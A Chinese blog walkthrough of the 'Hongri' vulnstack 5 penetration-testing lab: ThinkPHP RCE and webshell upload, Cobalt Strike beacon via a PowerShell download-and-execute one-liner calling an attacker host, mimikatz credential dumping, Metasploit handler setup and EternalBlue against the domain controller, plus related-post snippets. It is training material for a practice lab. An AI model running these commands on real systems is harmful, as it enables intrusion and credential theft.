红日靶场第五关

最新推荐文章于 2025-03-17 17:47:57 发布
最新推荐文章于 2025-03-17 17:47:57 发布
阅读量6.5k 收藏 12
点赞数 1
分类专栏: 内网攻防 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47533648/article/details/121668622
版权

红日靶场第五关

  • 可以查看我个人博客http://cllmsy.cn/与我交流,优快云只是为了方便发图。

一、环境配置

靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com
# win7 web需要打开C盘里的phpstudy,最好关一下防火墙

2008
sun\admin 2020.com
Win7双网卡模拟内外网

VMnet2网卡:192.168.25.0/24 外网
VMnet10网卡:192.168.26.0/24 内网

二、目标

一、环境搭建
    1.环境搭建测试
    2.信息收集
二、漏洞利用
    3.漏洞搜索与利用
    4.漏洞利用Getshell
    5.系统信息收集
    6.主机密码收集
三、内网搜集
    7.内网--继续信息收集
    8.内网攻击姿势--MS14-058
    9.内网攻击姿势--MS17-010
四、横向移动
    10.psexec远控
    11.内网其它主机端口
    12.netsh增删防火墙规则
五、构建通道
    13.内网其它主机端口-代理转发
六、持久控制
    14.域渗透-域成员信息收集
    15.域渗透-基础服务弱口令探测及深度利用之powershell
    16.域渗透-横向移动[wmi利用]
    17.域渗透-域控实现与利用
七、痕迹清理
    18、日志清理

三、WEB外网打点

3.1 资产收集

外网IP得到为192.168.25.128,开启了80端口。

在这里插入图片描述

3.2 Thinkphp getshell

在这里插入图片描述

3.2.1 tp5_invoke_func_code_exec_1漏洞

在这里插入图片描述

3.2.2 文件上传上线冰蝎

上传shell.php

在这里插入图片描述

getshell:

在这里插入图片描述

四、上线CS

4.1 木马后门上线

4.1.1 配置监听

开启CS

在这里插入图片描述

配置监听

在这里插入图片描述

攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行

4.1.2 上线CS成功

在这里插入图片描述

4.2 powershell上线

4.2.1 powershell命令执行

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.25.132:8899/a’))”

在这里插入图片描述

4.3 权限提升

MS16-135提权,插件随便选的。

在这里插入图片描述

五、内网信息收集

5.1 本机信息收集

5.1.1 判断存在域控

shell ipconfig /all

在这里插入图片描述

5.1.2 本机网卡IP

双网卡,外网为192.168.25.131 内网为192.138.26.134

在这里插入图片描述

5.1.3 查看其他域内主机信息

shell net view

在这里插入图片描述

5.1.4 判断是否存在多个域

shell net view /domain

在这里插入图片描述

5.2 ICMP内网探测

两台机子IP为:192.168.26.131 192.168.26.134(win7)

在这里插入图片描述

在这里插入图片描述

判断DC为192.168.26.131

5.3 端口扫描

在这里插入图片描述

5.4 SMB端口漏洞(永恒之蓝扫描)

在这里插入图片描述

5.5 mimikatz抓取

adiminitrator:

在这里插入图片描述

leo:

在这里插入图片描述

六、内网横向

6.1 psexec传递

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )

在这里插入图片描述

#因为DC不出网,所以psexec传递失败,需要关闭防火墙,或者放行端口,在进行psexec传递攻击,但是我尝试了多种方法,于是决定绕一绕。

6.2 联动MSF

6.2.1 CS上线MSF
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_https #要用https
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run

下图绕了一绕。

在这里插入图片描述

6.3 利用MS17-010永恒之蓝拿下DC

永恒之蓝配置:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

在这里插入图片描述

成功利用:(试了很多遍,这种方法有点玄学,后续会写另一种方法)

在这里插入图片描述

6.4 检测

在这里插入图片描述

七、总结

这次的靶场可能搭建有点问题,中间卡了几个点,一方面是psexec传递不知道为什么上线不了CS,于是通过了联动MSF,用永恒之蓝拿下了DC域控,在清除痕迹和黄票子还没做细节操作,后续会补上缺失的操作。
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 528
ATT&CK红队评估(红日靶场二)
红日靶场vulnstack (五)
2301_76227305的博客
12-04 884
很简单的一个靶机,没啥难度。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1807
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路,从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
03-17 764
谢绝捷径的诱惑,文字才能拥有直抵人心的力量简介"红日5"是一个高度仿真的内网渗透实战靶场,模拟了企业级内外网混合环境。靶场包含外网Web服务器(Windows 7)、内网域控服务器(Windows Server 2008)双重网络隔离场景,涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场,学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、社会工程学、Pass-the-Hash等APT攻击手法,并深入理解企业内网安全防护的薄弱环节。
红日靶场(五)
qq_58091216的博客
05-05 3470
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日靶场5
m0_58595840的博客
01-10 579
红日5内网渗透
红日内网渗透靶场5(ATK&CK红队评估实战靶场五)
qq_45780190的博客
04-24 4938
环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————————————————————————————————————— 2008账号密码 sun\admin 2020.com 外网采用NAT模式,内网采用仅主机模式。 添加一个主机模式用于内网,设置网段为192.168.138.0. NAT用于外网,设置网段为192.168.235.0
ATT&CK实战:红日靶场
学生
06-19 638
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
红日靶机(五)笔记
LINGX5的博客
10-17 1246
本环境由两台靶机组成,其中web服务器是双网卡,即可以访问外网,又可以访问内网。而域控制器是不出网的。我们要通过win7进而拿下域控。主要练习Thinkphp的非强制路由导致的RCE,以及CS集成框架的使用包括横向移动、权限维持、痕迹清理操作等
渗透测试-红日靶场
konglong12311的博客
05-23 2018
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场
konglong12311的博客
05-22 2011
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场2
weixin_48169878的博客
07-10 5087
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
红日靶场二-绕360
new_cool_boy的博客
06-16 831
靶场描述:目标机器:Web:边界服务器win server 2008 r2 配置有360安全卫士Pc:域内主机win7 配置有360安全卫士Dc:域控主机win server 2012 r2域控账户:de1ay\Administrator域控初始密码:1qaz@WSX攻击机:外网主机Windows11外网主机kali2022。
红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2747
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
小白渗透之旅——红日靶场5
qq_52849046的博客
05-28 1894
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战,容易被gangan
红日内网渗透靶场5
qq_48039118的博客
03-30 443
我是一名网安小白,此篇文章如有错误,请评论指出!!!
渗透测试-红日靶场
konglong12311的博客
05-27 1790
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
ATT&CK 红日5靶机渗透攻略
weixin_47311099的博客
01-27 2154
环境搭建 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 本次只有两台靶机 ,Win7双网卡模拟内外网 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com 改为 !qazwin7 ​ nat:192.168.8.129 (改为dhcp获取) 仅主机:192.168.138.136 到c盘phpstudy中启动phpstudy ​ ​ 2008 sun\admin 2020.com
红日靶场1
03-13
### 关于红日靶场的概述 红日靶场是由红日安全团队开发的一系列用于网络安全测试和渗透测试的学习平台。这些靶场旨在帮助学习者通过实际操作掌握网络攻击与防御的技术细节[^1]。 #### 红日靶场的功能特点 红日靶场提供了多个版本,例如 `vulnstack` 系列中的不同版本(如 vulnstack-7),每个版本都模拟了一个真实的网络环境,包含了多种常见的漏洞场景供用户实践。例如,在 `vulnstack-7` 中,可以通过访问其官网获取详细的漏洞描述和技术背景信息[^2]。 #### 域控制器的操作方法 在某些红日靶场环境中,可以利用命令行工具来查看域控制器的信息。例如,使用以下命令可以列出当前域下的所有域控制器: ```bash net group "domain controllers" /domain ``` 这一步对于了解目标网络结构非常重要,尤其是在涉及 Active Directory 的渗透测试中[^3]。 #### 远程连接到域控制器 一旦获得了域控制器的 IP 地址,就可以尝试通过远程桌面协议 (RDP) 登录到该服务器上。如果已知默认管理员账户及其密码,则可以直接登录并进一步探索内部资源。需要注意的是,在真实环境下不应未经授权执行此类操作;而在练习过程中为了简化流程可能会提供明文凭据,比如用户名为 `administrator`,密码为 `Admin12345`[^4]。 #### 存活主机探测技术 针对内网中存在的其他潜在可攻陷设备,Metasploit Framework 提供了几种有效的扫描模块来进行存活检测。以下是几个常用的辅助模块示例: - **UDP Sweep**: 使用 UDP 数据包批量发送请求以识别响应节点。 ```ruby use auxiliary/scanner/discovery/udp_sweep ``` - **NetBIOS Name Query Scanner**: 针对 Windows 平台上的 NetBIOS 协议实现服务名称解析功能。 ```ruby use auxiliary/scanner/netbios/nbname ``` 以上提到的方法均需谨慎对待,并仅限于合法授权范围内的实验用途[^5]。 ### 注意事项 尽管上述内容有助于理解如何开展基础性的信息安全评估活动,但在任何情况下都不应滥用所学技能去损害他人利益或违反法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值